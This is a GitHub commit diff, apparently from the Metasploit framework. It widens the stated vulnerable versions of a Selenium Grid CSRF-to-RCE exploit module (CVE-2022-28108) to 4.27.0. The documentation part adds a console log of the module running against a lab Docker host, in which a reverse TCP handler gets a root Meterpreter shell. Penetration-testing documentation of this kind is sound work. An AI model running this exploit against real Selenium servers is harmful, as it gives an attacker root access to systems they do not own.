Skip to content

Commit 3b947cf

Browse files
committed
Update vulnerable version
1 parent 38d8d35 commit 3b947cf

File tree

2 files changed

+26
-4
lines changed

2 files changed

+26
-4
lines changed

documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md

Lines changed: 24 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,18 +1,20 @@
11
## Vulnerable Application
22

3-
Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
3+
Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
4+
allows CSRF because it permits non-JSON content types
45
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
5-
The number of sessions must be fewer than maxSessions for the exploit to succeed.
6+
At least, the number of sessions must be fewer than maxSessions for the exploit to succeed.
67

78
The vulnerability affects:
89

9-
* Selenium Server (Grid) before 4.7
10+
* Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
1011

1112
This module was successfully tested on:
1213

1314
* selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
1415
* selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
1516
* selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
17+
* selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
1618

1719

1820
### Installation
@@ -136,3 +138,22 @@ BuildTuple : x86_64-linux-musl
136138
Meterpreter : x64/linux
137139
meterpreter >
138140
```
141+
142+
### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
143+
```
144+
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4449
145+
[*] Started reverse TCP handler on 192.168.56.1:4444
146+
[*] Running automatic check ("set AutoCheck false" to disable)
147+
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
148+
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60066) at 2025-01-02 09:29:36 +0900
149+
150+
meterpreter > getuid
151+
Server username: root
152+
meterpreter > sysinfo
153+
Computer : 172.17.0.2
154+
OS : Ubuntu 24.04 (Linux 6.8.0-51-generic)
155+
Architecture : x64
156+
BuildTuple : x86_64-linux-musl
157+
Meterpreter : x64/linux
158+
meterpreter >
159+
```

modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,8 @@ def initialize(info = {})
1515
info,
1616
'Name' => 'Selenium geckodriver RCE',
1717
'Description' => %q{
18-
Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
18+
Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
19+
allows CSRF because it permits non-JSON content types
1920
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
2021
},
2122
'Author' => [

0 commit comments

Comments
 (0)